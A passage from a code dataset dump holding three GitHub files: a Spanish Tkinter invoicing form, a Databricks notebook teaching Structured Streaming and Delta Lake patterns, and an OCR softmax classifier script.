cli, prov, prod, prec = item[\"values\"][0:5]\n global codigoSeleccionado\n codigoSeleccionado = cod\n global datosFactura\n datosFactura = []\n datosFactura.append(cli)\n datosFactura.append(prov)\n datosFactura.append(prod)\n datosFactura.append(prec)\n print(len(datosFactura))\n\ndef accionboton():\n if (codigoSeleccionado == None):\n tk.messagebox.showerror(message=\"Debes seleccionar una factura en la tabla\", title=\"Error\", parent=marco)\n else:\n tk.messagebox.showinfo(message=f'Factura nº{codigoSeleccionado} impresa', title=\"Info\", parent=marco)\n imprimirFactura(codigoSeleccionado, datosFactura)\n\ndef creacionFacturas():\n connection = sqlite3.connect('base.db')\n cursor = connection.cursor()\n\n global marco\n marco = tk.Tk()\n marco.title(\"Generar Facturas\")\n marco.state('zoomed')\n marco.config(bg=\"yellow\")\n marco.grid_propagate(0)\n marco.iconbitmap(\"icono.ico\")\n\n etiqueta0 = tk.Label(marco, text=\" GENERAR FACTURAS \", bg=\"blue\", font =(\"Bahnschrift\",12)).grid(row=0, column=1, sticky=\"w\", padx=10, pady=10)\n\n espacio1 = tk.Label(marco, text=\"\", bg=\"yellow\").grid(row=1, column=0, sticky=\"w\",padx=10, pady=10)\n espacio2 = tk.Label(marco, text=\"\", bg=\"yellow\").grid(row=2, column=0, sticky=\"w\", padx=10, pady=10)\n espacio3 = tk.Label(marco, text=\"\", bg=\"yellow\").grid(row=3, column=0, sticky=\"w\", padx=10, pady=10)\n espacio4 = tk.Label(marco, text=\"\", bg=\"yellow\").grid(row=4, column=0, sticky=\"w\", padx=10, pady=10)\n\n etiqueta1 = tk.Label(marco, text=\"Código de la factura\", bg=\"blue\", font=(\"Bahnschrift\",12)).grid(row=5, column=0, sticky=\"w\", padx=10, pady=10)\n global codFactura\n codFactura = ttk.Entry(marco)\n codFactura.grid(row=5, column=1, sticky=\"w\", padx=10, pady=10)\n codFactura['state'] = 'disabled'\n\n etiqueta3 = tk.Label(marco, text=\"Clientes\", bg=\"blue\", font=(\"Bahnschrift\",12)).grid(row=7, column=0, sticky=\"w\", padx=10, pady=10)\n global clientes\n clientes = ttk.Combobox(marco)\n\n clientes['values'] = cursor.execute(\"SELECT nombre FROM clientes\").fetchall()\n clientes.grid(row=7, column=1, sticky=\"w\", padx=10, pady=10)\n clientes.bind('<>', actualizarClientes)\n\n etiqueta4 = tk.Label(marco, text=\"Proveedores\", bg=\"blue\", font=(\"Bahnschrift\", 12)).grid(row=8, column=0, sticky=\"w\",padx=10, pady=10)\n global proveedores\n proveedores = ttk.Combobox(marco)\n proveedores['values'] = cursor.execute(\"SELECT nombre FROM proveedores\").fetchall()\n proveedores.grid(row=8, column=1, sticky=\"w\", padx=10, pady=10)\n proveedores.bind('<>', actualizarProveedores)\n\n etiqueta4 = tk.Label(marco, text=\"Nombre del producto\", bg=\"blue\", font=(\"Bahnschrift\", 12)).grid(row=9, column=0,sticky=\"w\", padx=10,pady=10)\n global Nombreproductos\n Nombreproductos = ttk.Combobox(marco)\n Nombreproductos['values'] = cursor.execute(\"SELECT nombre FROM productos\").fetchall()\n Nombreproductos.grid(row=9, column=1, sticky=\"w\", padx=10, pady=10)\n Nombreproductos.bind('<>', actualizarProductos)\n\n etiqueta5 = tk.Label(marco, text=\"Precio del producto\", bg=\"blue\", font=(\"Bahnschrift\", 12)).grid(row=10, column=0,sticky=\"w\",padx=10, pady=10)\n global Precioproductos\n Precioproductos = ttk.Combobox(marco)\n Precioproductos['values'] = (10,20,30,40,50)\n Precioproductos.grid(row=10, column=1, sticky=\"w\", padx=10, pady=10)\n Precioproductos.bind('<>', actualizarPrecioProductos)\n\n global tabla\n tabla = ttk.Treeview(marco,\n columns=(\"id\", \"cliente\", \"proveedor\",\"nombre_producto\", \"precio_producto\"))\n tabla[\"show\"] = \"headings\"\n tabla.column(\"#0\")\n tabla.column(\"id\", width=150, anchor=tk.CENTER)\n tabla.column(\"cliente\", width=150, anchor=tk.CENTER)\n tabla.column(\"proveedor\", width=150, anchor=tk.CENTER)\n tabla.column(\"nombre_producto\", width=150, anchor=tk.CENTER)\n tabla.column(\"precio_producto\", width=150, anchor=tk.CENTER)\n\n tabla.heading(\"id\", text=\"id\", anchor=tk.CENTER)\n tabla.heading(\"cliente\", text=\"cliente\", anchor=tk.CENTER)\n tabla.heading(\"proveedor\", text=\"proveedor\", anchor=tk.CENTER)\n tabla.heading(\"nombre_producto\", text=\"nombre_producto\", anchor=tk.CENTER)\n tabla.heading(\"precio_producto\", text=\"precio_producto\", anchor=tk.CENTER)\n\n conexion = sqlite3.connect('base.db')\n cursor = conexion.cursor()\n cursor.execute(\"SELECT * FROM generar_facturas\")\n\n i = 0\n for a in cursor:\n tabla.insert(\"\", i, text=\"\", values=(a[0], a[1], a[2], a[3], a[4]))\n i += 1\n tabla.bind(\"<>\", onSelected)\n tabla.place(x=450, y=450)\n\n\n global botonGuardar\n botonGuardar = Button(marco)\n botonGuardar.config(text=\"GUARDAR\", width=10, height=2, anchor=\"center\", activebackground=\"blue\", relief=\"raised\",\n borderwidth=5, font=(\"Banschrift\", 11), command=lambda: guardar())\n botonGuardar.grid(row=13, column=1, sticky=\"w\", padx=100, pady=100)\n\n global botonImprimir\n botonImprimir = Button(marco)\n botonImprimir.config(text=\"IMPRIMIR FACTURA\", width=10, height=2, anchor=\"center\",\n activebackground=\"blue\", relief=\"raised\",\n borderwidth=5, font=(\"Bahnschrift\", 11), command=lambda: accionboton())\n botonImprimir.place(x=700, y=680, width=200)","repo_name":"InigoCG/Python_Facturacion","sub_path":"generarFactura.py","file_name":"generarFactura.py","file_ext":"py","file_size_in_byte":8192,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20142997891","text":"# Databricks notebook source\n# MAGIC %md-sandbox\n# MAGIC \n# MAGIC
\n# MAGIC \"Databricks\n# MAGIC
\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC # Streaming Design Patterns\n# MAGIC \n# MAGIC The Lakehouse has been designed from the beginning to work seamlessly with datasets that grow infinitely over time. While Spark Structured Streaming is often positioned as a near real-time data processing solution, it combines with Delta Lake to also provide easy batch processing of incremental data while drastically simplifying the overhead required to track data changes over time.\n# MAGIC \n# MAGIC ## Learning Objectives\n# MAGIC By the end of this lessons, student will be able to:\n# MAGIC - Use Structured Streaming to complete simple incremental ETL\n# MAGIC - Perform incremental writes to multiple tables\n# MAGIC - Incrementally update values in a key value store\n# MAGIC - Process Change Data Capture (CDC) data into Delta Tables using `MERGE`\n# MAGIC - Join two incremental tables\n# MAGIC - Join incremental and batch tables\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Run the following script to setup necessary variables and clear out past runs of this notebook.\n\n# COMMAND ----------\n\n# MAGIC %run ../Includes/sql-setup $course=\"stream_design\" $mode=\"reset\"\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Note that because Structured Streaming will be used throughout this lesson, checkpoint directories will need to be specified for each of our different streaming queries.\n# MAGIC \n# MAGIC The code below declares the checkpoints used throughout the lesson, and does a recursive delete to remove any state information from previous runs.\n\n# COMMAND ----------\n\ncheckpointPath = userhome + \"/_checkpoints/\"\nsilverCheckpoint = checkpointPath + \"silver/\"\nsplitStreamCheckpoint = checkpointPath + \"split_stream/\"\nkeyValueCheckpoint = checkpointPath + \"key_value/\"\nsilverStatusCheckpoint = checkpointPath + \"silver_status/\"\njoinedCheckpoint = checkpointPath + \"joined/\"\njoinStatusCheckpoint = checkpointPath + \"join_status/\"\n\ndbutils.fs.rm(checkpointPath, True)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Simple Incremental ETL\n# MAGIC \n# MAGIC Likely the highest volume of data being processed by most organizations could largely be describing as moving data from one location to another while applying light transformations and validations. As most source data continues to grow as time passes, it's appropriate to refer to this data as incremental (sometimes also referred to as streaming data). Structured Streaming and Delta Lake make incremental ETL easy. \n# MAGIC \n# MAGIC Below we'll create a simple table and insert some values.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC \n# MAGIC CREATE TABLE bronze \n# MAGIC (id INT, name STRING, value DOUBLE); \n# MAGIC \n# MAGIC INSERT INTO bronze\n# MAGIC VALUES (1, \"Yve\", 1.0),\n# MAGIC (2, \"Omar\", 2.5),\n# MAGIC (3, \"Elia\", 3.3)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC The following cell defines an incremental read on the table just created using Structured Streaming, adds a field to capture when the record was processed, and writes out to a new table as a single batch.\n\n# COMMAND ----------\n\ndef update_silver():\n spark.readStream.table(\"bronze\").withColumn(\"processed_time\", F.current_timestamp()).writeStream.option(\"checkpointLocation\", silverCheckpoint).trigger(once=True).table(\"silver\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Note that while this code uses Structured Streaming, it's appropriate to think of this as a triggered batch processing incremental changes.\n\n# COMMAND ----------\n\nupdate_silver()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC As expected, the stream runs for a very brief time, and the `silver` table written contains all the values previously written to `bronze`.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM silver\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Processing new records is as easy as adding them to our source table `bronze`...\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC INSERT INTO bronze\n# MAGIC VALUES (4, \"Ted\", 4.7),\n# MAGIC (5, \"Tiffany\", 5.5),\n# MAGIC (6, \"Vini\", 6.3)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ... and re-executing the incremental batch processing code.\n\n# COMMAND ----------\n\nupdate_silver()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Delta Lake is ideally suited for easily tracking and propagating inserted data through a series of tables. This pattern has a number of names, including \"medallion\", \"multi-hop\", \"Delta\", and \"bronze/silver/gold\" architecture.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM silver\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Writing to Multiple Tables\n# MAGIC \n# MAGIC Those familiar with Structured Streaming may be aware that the `foreachBatch` method provides the option to execute custom data writing logic on each microbatch of streaming data.\n# MAGIC \n# MAGIC New DBR functionality provides guarantees that these writes will be idempotent, even when writing to multiple tables. This is especially useful when data for multiple tables might be contained within a single record.\n# MAGIC \n# MAGIC The code below first defines the custom writer logic to append records to two new tables, and then demonstrates using this function within `foreachBatch`.\n\n# COMMAND ----------\n\ndef write_twice(microBatchDF, batchId):\n appId = 'write_twice'\n \n microBatchDF.select(\"id\", \"name\", F.current_timestamp().alias(\"processed_time\")).write.option(\"txnVersion\", batchId).option(\"txnAppId\", appId).mode(\"append\").saveAsTable(\"silver_name\")\n \n microBatchDF.select(\"id\", \"value\", F.current_timestamp().alias(\"processed_time\")).write.option(\"txnVersion\", batchId).option(\"txnAppId\", appId).mode(\"append\").saveAsTable(\"silver_value\")\n\n\ndef split_stream():\n (spark.readStream.table(\"bronze\")\n .writeStream\n .foreachBatch(write_twice)\n .outputMode(\"update\")\n .option(\"checkpointLocation\", splitStreamCheckpoint)\n .trigger(once=True)\n .start())\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Note that while a stream will again be triggered, the two writes contained within the `write_twice` function are using Spark batch syntax. This will always be the case for writers called by `foreachBatch`.\n\n# COMMAND ----------\n\nsplit_stream()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC The cells below demonstrate the logic was applied properly to split the initial data into two tables.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM silver_name\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Note that the `processed_time` for each of these tables differs slightly. The logic defined above captures the current timestamp at the time each write executes, demonstrating that while both writes happen within the same streaming microbatch process, they are fully independent transactions (as such, downstream logic should be tolerant for slightly asynchronous updates).\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM silver_value\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Insert more values into the `bronze` table.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC INSERT INTO bronze\n# MAGIC VALUES (7, \"Viktor\", 7.4),\n# MAGIC (8, \"Hiro\", 8.2),\n# MAGIC (9, \"Shana\", 9.9)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC And we can now pick up these new records and write to two tables.\n\n# COMMAND ----------\n\nsplit_stream()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC As expected, only new values are inserted into the two tables, again a few moments apart.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM silver_name\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM silver_value\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Update Aggregates in a Key-Value Store\n# MAGIC \n# MAGIC Incremental aggregation can be useful for a number of purposes, including dashboarding and enriching reports with current summary data.\n# MAGIC \n# MAGIC The logic below defines a handful of aggregations against the `silver` table.\n\n# COMMAND ----------\n\ndef update_key_value():\n (spark.readStream\n .table(\"silver\")\n .groupBy(\"id\")\n .agg(F.sum(\"value\").alias(\"total_value\"), \n F.mean(\"value\").alias(\"avg_value\"),\n F.count(\"value\").alias(\"record_count\"))\n .writeStream\n .option(\"checkpointLocation\", keyValueCheckpoint)\n .outputMode(\"complete\")\n .trigger(once=True)\n .table(\"key_value\"))\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC **NOTE**: Because the transformations above require shuffling data, setting the number of partitions to map to the cores in our streaming cluster will provide more efficient performance. (If the cluster size will be scaled up for production, the maximum number of cores that will be present in the cluster should be used when configuring this setting.)\n\n# COMMAND ----------\n\nspark.conf.set(\"spark.sql.shuffle.partitions\", 4)\n\n# COMMAND ----------\n\nupdate_key_value()\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM key_value\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Adding more values to the `silver` table will allow more interesting aggregation.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC INSERT INTO silver\n# MAGIC VALUES (1, \"Yve\", 1.0, current_timestamp()),\n# MAGIC (2, \"Omar\", 2.5, current_timestamp()),\n# MAGIC (3, \"Elia\", 3.3, current_timestamp()),\n# MAGIC (7, \"Viktor\", 7.4, current_timestamp()),\n# MAGIC (8, \"Hiro\", 8.2, current_timestamp()),\n# MAGIC (9, \"Shana\", 9.9, current_timestamp())\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC One thing to note is that the logic being executed is currently overwriting the resulting table with each write. In the next section, `MERGE` will be used in combination with `foreachBatch` to update existing records. This pattern can also be applied with key-value stores.\n\n# COMMAND ----------\n\nupdate_key_value()\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM key_value\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Processing Change Data Capture Data\n# MAGIC While the change data capture (CDC) data emitted by various systems will vary greatly, incrementally processing these data with Databricks is straightforward.\n# MAGIC \n# MAGIC Here the `bronze_status` table will represent the raw CDC information, rather than row-level data.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC CREATE TABLE bronze_status \n# MAGIC (user_id INT, status STRING, update_type STRING, processed_timestamp TIMESTAMP);\n# MAGIC \n# MAGIC INSERT INTO bronze_status\n# MAGIC VALUES (1, \"new\", \"insert\", current_timestamp()),\n# MAGIC (2, \"repeat\", \"update\", current_timestamp()),\n# MAGIC (3, \"at risk\", \"update\", current_timestamp()),\n# MAGIC (4, \"churned\", \"update\", current_timestamp()),\n# MAGIC (5, null, \"delete\", current_timestamp())\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC The `silver_status` table below has been created to track the current `status` for a given `user_id`.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC CREATE TABLE silver_status (user_id INT, status STRING, updated_timestamp TIMESTAMP)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC The `MERGE` statement can easily be written with SQL to apply CDC changes appropriately, given the type of update received.\n# MAGIC \n# MAGIC The rest of the `upsert_cdc` method contains the logic necessary to run SQL code against a micro-batch in a PySpark DataStreamWriter.\n\n# COMMAND ----------\n\ndef upsert_cdc(microBatchDF, batchID):\n microBatchDF.createTempView(\"bronze_batch\")\n \n query = \"\"\"\n MERGE INTO silver_status s\n USING bronze_batch b\n ON b.user_id = s.user_id\n WHEN MATCHED AND b.update_type = \"update\"\n THEN UPDATE SET user_id=b.user_id, status=b.status, updated_timestamp=b.processed_timestamp\n WHEN MATCHED AND b.update_type = \"delete\"\n THEN DELETE\n WHEN NOT MATCHED AND b.update_type = \"update\" OR b.update_type = \"insert\"\n THEN INSERT (user_id, status, updated_timestamp)\n VALUES (b.user_id, b.status, b.processed_timestamp)\n \"\"\"\n \n microBatchDF._jdf.sparkSession().sql(query)\n \ndef streaming_merge():\n spark.readStream.table(\"bronze_status\").writeStream.foreachBatch(upsert_cdc).option(\"checkpointLocation\", silverStatusCheckpoint).outputMode(\"update\").trigger(once=True).start()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC As always, we incrementally process newly arriving records.\n\n# COMMAND ----------\n\nstreaming_merge()\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM silver_status\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Inserting new records will allow us to then apply these changes to our silver data.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC INSERT INTO bronze_status\n# MAGIC VALUES (1, \"repeat\", \"update\", current_timestamp()),\n# MAGIC (2, \"at risk\", \"update\", current_timestamp()),\n# MAGIC (3, \"churned\", \"update\", current_timestamp()),\n# MAGIC (4, null, \"delete\", current_timestamp()),\n# MAGIC (6, \"new\", \"insert\", current_timestamp())\n\n# COMMAND ----------\n\nstreaming_merge()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Note that at present, the logic would not be particularly robust to data arriving out-of-order or duplicate records (but these occurences can be handled).\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM silver_status\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Joining Two Incremental Tables\n# MAGIC \n# MAGIC Note that there are many intricacies around watermarking and windows when dealing with incremental joins, and that not all join types are supported.\n\n# COMMAND ----------\n\ndef stream_stream_join():\n nameDF = spark.readStream.table(\"silver_name\")\n valueDF = spark.readStream.table(\"silver_value\")\n \n (nameDF.join(valueDF, nameDF.id == valueDF.id, \"inner\")\n .select(nameDF.id, \n nameDF.name, \n valueDF.value, \n F.current_timestamp().alias(\"joined_timestamp\"))\n .writeStream\n .option(\"checkpointLocation\", joinedCheckpoint)\n .table(\"joined_streams\"))\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Note that the logic defined above does not set a `trigger` option. This means that the stream will run in continuous execution mode, triggering every 500ms by default.\n\n# COMMAND ----------\n\nstream_stream_join()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Running `display()` on a streaming table read is a way to monitor table updates in near-real-time while in interactive development. Note that a separate stream is started.\n\n# COMMAND ----------\n\ndisplay(spark.readStream.table(\"joined_streams\"))\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Here we'll add new values to the `bronze` table.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC INSERT INTO bronze\n# MAGIC VALUES (10, \"Pedro\", 10.5),\n# MAGIC (11, \"Amelia\", 11.5),\n# MAGIC (12, \"Diya\", 12.3),\n# MAGIC (13, \"Li\", 13.4),\n# MAGIC (14, \"Daiyu\", 14.2),\n# MAGIC (15, \"Jacques\", 15.9)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC The stream-stream join is configured against the tables resulting from the `split_stream` function; run this again and data should quickly process through the streaming join running above.\n\n# COMMAND ----------\n\nsplit_stream()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Interactive streams should always be stopped before leaving a notebook session, as they can keep clusters from timing out and incur unnecessary cloud costs.\n\n# COMMAND ----------\n\nfor stream in spark.streams.active:\n stream.stop()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Join Incremental and Static Data\n# MAGIC \n# MAGIC While incremental tables are ever-appending, static tables typically can be thought of as containing data that may be changed or overwritten.\n# MAGIC \n# MAGIC Because of Delta Lake's transactional guarantees and caching, Databricks ensures that each microbatch of streaming data that's joined back to a static table will contain the current version of data from the static table.\n\n# COMMAND ----------\n\nstatusDF = spark.read.table(\"silver_status\")\nbronzeDF = spark.readStream.table(\"bronze\")\n\nbronzeDF.alias(\"bronze\").join(statusDF.alias(\"status\"), bronzeDF.id==statusDF.user_id, \"inner\").select(\"bronze.*\", \"status.status\").writeStream.option(\"checkpointLocation\", joinStatusCheckpoint).table(\"joined_status\")\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM joined_status\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Only those records with a matching `id` in `joined_status` at the time the stream is processed will be represented in the resulting table.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM silver_status\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Processing new records into the `silver_status` table will not automatically trigger updates to the results of the stream-static join.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC INSERT INTO bronze_status\n# MAGIC VALUES (11, \"repeat\", \"update\", current_timestamp()),\n# MAGIC (12, \"at risk\", \"update\", current_timestamp()),\n# MAGIC (16, \"new\", \"insert\", current_timestamp()),\n# MAGIC (17, \"repeat\", \"update\", current_timestamp())\n\n# COMMAND ----------\n\nstreaming_merge()\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM joined_status\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Only new data appearing on the streaming side of the query will trigger records to process using this pattern.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC INSERT INTO bronze\n# MAGIC VALUES (16, \"Marissa\", 1.9),\n# MAGIC (17, \"Anne\", 2.7)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC The incremental data in a stream-static join \"drives\" the stream, guaranteeing that each microbatch of data joins with the current values present in the valid version of the static table.\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM joined_status\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Stop Streaming Jobs\n\n# COMMAND ----------\n\n# Stop Streaming Job\nfor stream in spark.streams.active:\n stopped = True\n stream.stop()\n\n# COMMAND ----------\n\n# MAGIC %md-sandbox\n# MAGIC © 2022 Databricks, Inc. All rights reserved.
\n# MAGIC Apache, Apache Spark, Spark and the Spark logo are trademarks of the Apache Software Foundation.
\n# MAGIC
\n# MAGIC Privacy Policy | Terms of Use | Support\n","repo_name":"zubair527/advanced-data-engineering-with-databricks","sub_path":"Advanced-Data-Engineering-with-Databricks/01 - Architecting for the Lakehouse/ADE 1.04 - Streaming Design Patterns.py","file_name":"ADE 1.04 - Streaming Design Patterns.py","file_ext":"py","file_size_in_byte":18664,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"386451756","text":"import png\r\nimport numpy as np\r\nimport time\r\nimport math\r\nimport OCR_Preprocess as pre\r\nimport OCR_SVD as svd #Used since the testing algorithm is identical.\r\n#import OCR_IDX as idx\r\n\r\n#Builds a random prior for A and b by choosing a random order 1 number for each entry.\r\ndef randomPrior(xSize, ySize):\r\n\treturn np.random.randn(ySize, xSize), np.random.randn(ySize)\r\n\r\n\r\ndef buildMatrices(dataByFile, yData, reader, batchSize, stepSize, numSteps):\r\n\t\r\n\tXLength = reader.imageSize[0]*reader.imageSize[1]\r\n\tYLength = len(yData)\r\n\t\r\n\tA, b = randomPrior(XLength, YLength)\r\n\t\r\n\tcounter = 0\r\n\t\r\n\t#for batch in dataByFile.trainingBatch(batchSize):\r\n\tfor i in range(numSteps):\r\n\t\tbatch = dataByFile.getRandomTrainingPoints(batchSize)\r\n\t\r\n\t\tcounter = counter + 1\r\n\t\tif(counter % 1 == 0):\r\n\t\t\tprint(\"On batch number \" + str(counter))\r\n\t\t\r\n\t\tADiff = np.zeros(A.shape)\r\n\t\tbDiff = np.zeros(b.shape)\r\n\t\t\r\n\t\tfor token, filename in batch:\r\n\t\t\t\r\n\t\t\tcurrentXData = (reader.processedImage(filename)).flatten()\r\n\t\t\tcurrentYData = yData[token]\r\n\t\t\t\r\n\t\t\tyGuess = np.dot(A, currentXData) + b\r\n\t\t\tyGuessExp = np.exp(yGuess)\r\n\t\t\tZ = np.sum(yGuessExp)\r\n\t\t\t\r\n\t\t\t#print(yGuess)\r\n\t\t\tADiff = ADiff + np.outer(currentYData, currentXData) - np.outer(yGuessExp, currentXData)/Z\r\n\t\t\tbDiff = bDiff + currentYData - yGuessExp/Z\r\n\t\t\r\n\t\tnormalization = max(1.0, np.trace(np.dot(ADiff, ADiff.T)) + np.dot(bDiff,bDiff))\r\n\t\t\r\n\t\tADiff = ADiff/math.sqrt(normalization)\r\n\t\tbDiff = bDiff/math.sqrt(normalization)\r\n\t\t\r\n\t\tA = A + ADiff*stepSize\r\n\t\tb = b + bDiff*stepSize\r\n\t\t\r\n\treturn A,b \r\n\t\r\nif __name__ == \"__main__\":\r\n\tbaseDirectory = \"..\\\\NISTHandwritingDatabase\\\\by_class\"\r\n\tsubfolderPrefix = \"train_\"\r\n\ttypeTokens = ['30','31','32','33','34','35','36','37','38','39']\r\n\ttestFraction = 0.1\r\n\timageSize = [128,128]\r\n\tcroppingMargins = [32,32,32,32]\r\n\tmaxImagesPerChar = 0\r\n\tnumSteps = 1000\r\n\tbatchSize = 100\r\n\tstepSize = 0.5\r\n\tcoarseGrainFactor = 2\r\n\tnormalize = True\r\n\tinvert = True\r\n\tlogFilename = \"OCR_1Layer_log.txt\"\r\n\tweightsFilename = \"OCR_1Layer_Weights.npz\"\r\n\t\r\n\treader = pre.imageReader(imageSize, croppingMargins, coarseGrainFactor, normalize, invert)\r\n\t\r\n\t\r\n\ttimeStart = time.time()\r\n\r\n\tdataByFile = pre.dataSets(baseDirectory, subfolderPrefix, typeTokens, testFraction, maxImagesPerChar)\r\n\tyData = svd.buildYVectors(typeTokens)\r\n\r\n\t\r\n\tfileIndexCheckpoint = time.time()\r\n\tfileIndexTime = fileIndexCheckpoint - timeStart\r\n\t\r\n\t\r\n\tA, b = buildMatrices(dataByFile, yData, reader, batchSize, stepSize, numSteps)\r\n\t\r\n\ttrainingCheckpoint = time.time()\r\n\ttrainingTime = trainingCheckpoint - fileIndexCheckpoint\r\n\t\r\n\tpercentPassed, guessMatrix = svd.percentTestPassed(A, b, dataByFile, yData, reader)\r\n\t\r\n\ttimeEnd = time.time()\r\n\ttestingTime = timeEnd - trainingCheckpoint\r\n\ttotalTime = timeEnd - timeStart\r\n\t\r\n\tprint(\"Fraction passed: \" + str(percentPassed))\r\n\t\r\n\tnp.savez_compressed(weightsFilename, A=A, b=b)\r\n\t\r\n\tf = open(logFilename, 'w')\r\n\tf.write(\"Results for OCR performed using 1-layer softmax and gradient descent.\\n\")\r\n\tf.write(\"The weights determined by this run have been saved to: \" + weightsFilename + \"\\n\")\r\n\tf.write(\"Files loaded from: \" + dataByFile.directoryName('##') + \"\\n\")\r\n\tf.write(\"Character tokens used (## in the filename): \" + str(typeTokens)+\"\\n\")\r\n\tf.write(\"Margin cropping in pixels: Top: \" + str(croppingMargins[0]) + \" Bottom: \" + str(croppingMargins[1]) + \" Left: \" + str(croppingMargins[2]) + \" Right: \" + str(croppingMargins[3])+ \"\\n\")\r\n\tf.write(\"Coarse graining factor: \" + str(coarseGrainFactor)+ \"\\n\")\r\n\tf.write(\"Fraction of images randomly chosen for testing: \" + str(testFraction)+ \"\\n\")\r\n\tf.write(\"Max number of each character considered (randomly chosen): \" + (str(maxImagesPerChar)+ \"\\n\" if maxImagesPerChar > 0 else \"None\\n\"))\r\n\tf.write(\"\\n\")\r\n\tf.write(\"Total number of images trained: \" + str(dataByFile.numTrained)+ \"\\n\")\r\n\tf.write(\"Total number of images tested: \" + str(dataByFile.numTested)+ \"\\n\")\r\n\tf.write(\"Time indexing files: \" + str(fileIndexTime) + \"\\n\")\r\n\tf.write(\"Time training: \" + str(trainingTime) + \"\\n\")\r\n\tf.write(\"Time testing: \" + str(testingTime) + \"\\n\")\r\n\tf.write(\"Total time: \" + str(totalTime) + \"\\n\")\r\n\tf.write(\"\\n\")\r\n\tf.write(\"\\n\")\r\n\tf.write(\"Total fraction of tests passed: \" + str(percentPassed)+ \"\\n\")\r\n\tf.write(\"\\n\")\r\n\tf.write(\"\\n\")\r\n\tf.write(\"This is the prediction matrix. Provides the fraction of the time a given character was guessed to be a given other character.\\n\")\r\n\tf.write(\"Rows indicate actual values, columns the predicted values.\\n\")\r\n\tf.write(\"\\n\")\r\n\tf.write(\" |\")\r\n\tfor token in typeTokens:\r\n\t\tf.write(\" \" + str(token) + \" \") \r\n\tf.write(\"\\n\")\r\n\tf.write(\"----+\")\r\n\tfor token in typeTokens:\r\n\t\tf.write(\"--------\") \r\n\tf.write(\"\\n\")\t\r\n\tfor rowToken in typeTokens:\r\n\t\tf.write(\" \" + str(rowToken) + \" |\")\r\n\t\tfor columnToken in typeTokens:\r\n\t\t\tf.write(\" \" + \"{:6.4f}\".format(guessMatrix[(rowToken, columnToken)]) + \" 